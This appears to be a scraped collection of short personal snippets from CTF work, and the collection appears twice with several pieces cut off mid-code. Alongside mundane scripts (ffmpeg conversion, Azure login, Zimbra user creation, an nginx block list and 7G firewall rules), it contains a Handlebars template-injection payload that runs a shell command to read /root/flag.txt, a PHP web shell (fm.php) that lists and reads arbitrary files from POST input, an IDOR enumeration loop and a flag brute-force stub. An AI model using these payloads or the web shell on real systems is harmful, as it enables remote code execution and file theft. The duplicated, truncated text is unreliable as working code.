laztname

## spot.php
<?php


error_reporting(0);

## webm-to-mp3.sh
find . -type f -iname "*.webm" -exec bash -c 'FILE="$1"; ffmpeg -i "${FILE}" -vn -ab 128k -ar 44100 -y "${FILE%.webm}.mp3";' _ '{}' \;

## nginx-block.conf
server {
    ## Block user agents
    set $block_user_agents 0;

    # Common bandwidth hoggers and hacking tools.
    if ($http_user_agent ~ "libwww-perl") {
        set $block_user_agents 1;
    }
    if ($http_user_agent ~ "Go-http-client") {
        set $block_user_agents 1;

## login.sh
read -sp "Azure password: " AZ_PASS && echo && az login -u <username> -p $AZ_PASS

## brute-flag-password.sh
#!/bin/bash
# used to phonebook challenges
# flag are lowercase with number and underscore

# initial flag
flag="HTB{"

# loop till die
while true; do
  	# loop on possible chars

## 7g.txt
# 7G FIREWALL v1.5 20211103
# @ https://perishablepress.com/7g-firewall/

# 7G:[CORE]
ServerSignature Off
Options -Indexes
RewriteEngine On
RewriteBase /

# 7G:[QUERY STRING]

## handlebars-exploit.txt
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
{{this.pop}}

## enum.sh
#!/bin/bash
for i in {1..100};
do curl -s "http://ctf.natrya.co.id:8080/users/view.php?userid=$i" --cookie "PHPSESSID=1slnhm4q3lcv984lor9teg1282"  | grep are | grep -o -P '(?<=are ).*(?=\&#39)';
done

## user.sh
#!/bin/bash
for i in $(cat user); do
        pass=$(curl -s https://www.dinopass.com/password/strong 2> /dev/null);
        zmprov ca $i@example.com "$pass";
        echo "[+] user:$i created with password: $pass" >> /tmp/log;
        sleep 0.2;
done

## fm.php
<?=

# $ curl localhost/fm.php --data "0=."
# $ curl localhost/fm.php --data "0=fm.php&r"

$path = $_POST[0];
print_r(scandir($path));
if (isset($_POST['r']) && file_exists($path)) {
  readfile($path);
  print_r(file_get_contents($path));
	server {
	## Block user agents
	set $block_user_agents 0;

	# Common bandwidth hoggers and hacking tools.
	if ($http_user_agent ~ "libwww-perl") {
	set $block_user_agents 1;
	}
	if ($http_user_agent ~ "Go-http-client") {
	set $block_user_agents 1;
	#!/bin/bash
	# used to phonebook challenges
	# flag are lowercase with number and underscore

	# initial flag
	flag="HTB{"

	# loop till die
	while true; do
	# loop on possible chars
	# 7G FIREWALL v1.5 20211103
	# @ https://perishablepress.com/7g-firewall/

	# 7G:[CORE]
	ServerSignature Off
	Options -Indexes
	RewriteEngine On
	RewriteBase /

	# 7G:[QUERY STRING]
	{{#with "s" as \|string\|}}
	{{#with "e"}}
	{{#with split as \|conslist\|}}
	{{this.pop}}
	{{this.push (lookup string.sub "constructor")}}
	{{this.pop}}
	{{#with string.split as \|codelist\|}}
	{{this.pop}}
	{{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
	{{this.pop}}
	#!/bin/bash
	for i in {1..100};
	do curl -s "http://ctf.natrya.co.id:8080/users/view.php?userid=$i" --cookie "PHPSESSID=1slnhm4q3lcv984lor9teg1282" \| grep are \| grep -o -P '(?<=are ).*(?=\&#39)';
	done
	#!/bin/bash
	for i in $(cat user); do
	pass=$(curl -s https://www.dinopass.com/password/strong 2> /dev/null);
	zmprov ca $i@example.com "$pass";
	echo "[+] user:$i created with password: $pass" >> /tmp/log;
	sleep 0.2;
	done
	<?=

	# $ curl localhost/fm.php --data "0=."
	# $ curl localhost/fm.php --data "0=fm.php&r"

	$path = $_POST[0];
	print_r(scandir($path));
	if (isset($_POST['r']) && file_exists($path)) {
	readfile($path);
	print_r(file_get_contents($path));